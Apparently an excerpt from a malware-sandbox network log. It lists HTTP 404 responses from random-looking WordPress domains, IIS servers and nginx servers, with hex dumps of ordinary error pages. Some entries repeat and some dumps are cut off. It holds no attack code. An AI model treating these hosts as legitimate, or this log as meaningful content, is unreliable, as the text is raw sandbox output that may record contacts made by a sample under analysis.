Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FV%2F0CO4X%2BNUM2MVKtEbAmAMlFZfeD06dqRZx%2FWrfPyim6RXSsXZdpWofdYr6oGBl3fXciDO%2FtQ9hl56jZcLYaqFawr20HIjWLvmh98eRHHcycRJf%2B9Eq5aZq9tvqJg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9dc19cac461-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1273&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2485836&cwnd=251&unsent_bytes=0&cid=8328a6600c482dbd&ts=825&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYInVkQAk1Xvke%2BhWXJENW%2FYYIUMCfDNjM7sQzEZ6F0ttiMwQesDUGPkVS%2BpLpODDVkSDIC3KTTjzFaFgQ3Fw23pry%2FDMDCxXKbl76V3MGg0LJZG0vJopElRFhfK0A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9e99aa58c1e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1250&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2305732&cwnd=246&unsent_bytes=0&cid=1e1901910ae2c204&ts=841&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="84.3",amp_style_sanitizer;dur="40.6",amp_tag_and_attribute_sanitizer;dur="38.1",amp_optimizer;dur="22.2"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJiLYd4KKBd%2Fm7d%2BhBa9drInBBwIM4663Z7ZrbKl2D7ZKJPHW%2B0gd1PnkggHXThGKW%2FkxLs0QxD%2F2XgJ8dwNTrNwYoSK8uTywtDjgvGWPFEo59mPwEBFyeAHEYmuLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9fa5f0c0f5b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2112326&cwnd=251&unsent_bytes=0&cid=e9b2a8aaf2341270&ts=1571&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="34.2",amp_style_sanitizer;dur="16.3",amp_tag_and_attribute_sanitizer;dur="13.9",amp_optimizer;dur="17.2"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kus9P3y2%2BRqvAVpyEpaJbKgn68tLj1%2Bji4%2BAtNVBXpmuJbq0nb0w160qXy1KZOatWKVJpfdNsQrddTj6eftlrA8TO0BAZmgs%2BdO2mANgqhVgubhVbcamjvpbqxPuZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffa09bfebac30-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=12237&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236678&cwnd=37&unsent_bytes=0&cid=1a8a2e71f1f2f113&ts=1547&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:25:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1q%2FLtAjLrraWfZWMWr6k9FNeLWhoeB6mvFaA4%2FPSwWbjHXUmeH04%2FkkSuj%2BX9M0UVbfUxC74hrhiT%2FFbwnSOw%2Ffq%2B6K8ezY8Hp4XS7%2FpPuxT0oegprFZw1wbgaHK%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffbffeadb182d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2473099&cwnd=251&unsent_bytes=0&cid=e42556b4c044e8f3&ts=796&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:25:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3uzluE%2B5GVqzzY2kY8vJvXK4WazQ5i0dF51uloPWmsOqWjIlA8Q7rB88OEc4foIrLrO1ygkx71D9HS%2BY%2FqOIopG8qWPHZ5R02uEgUgg8fhN%2FquO1rvC4TyTrboNdqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffc0a4e164325-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=71331d2500b9e766&ts=781&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:26:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="39.8",amp_style_sanitizer;dur="14.6",amp_tag_and_attribute_sanitizer;dur="19.8",amp_optimizer;dur="20.4"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1oh8r9mKlLNoJYvnWdzuKvm4aYVeUyhRNhyQczsrQQT%2BRyquiLJCABmPtPcEWccV2LDyGjlxsoWtRgi1OuNlv0flSzl0GZZnqDH5SvynmSCCXAItng4Vhrt2yuZug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffc174951ac06-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=11837&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=243955&cwnd=37&unsent_bytes=0&cid=49c92739f32545da&ts=1431&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:26:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="38.6",amp_style_sanitizer;dur="18.9",amp_tag_and_attribute_sanitizer;dur="14.8",amp_optimizer;dur="20.4"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pdnshuhj2FQouaovKGIqb4cBOZWU16Wjj7TZogvepW5jq5ObdluKzqGVVY0y96sEdnyZh1AbDDgrYHKCafSuaIxkgE2vE7HDmHTW6pof9CkeJOYj59nHvS1gdaLDw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffc27e9010c96-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=2a9a016731b5290c&ts=1456&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:24:00 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:24:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:24:05 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:05 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:24:00 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
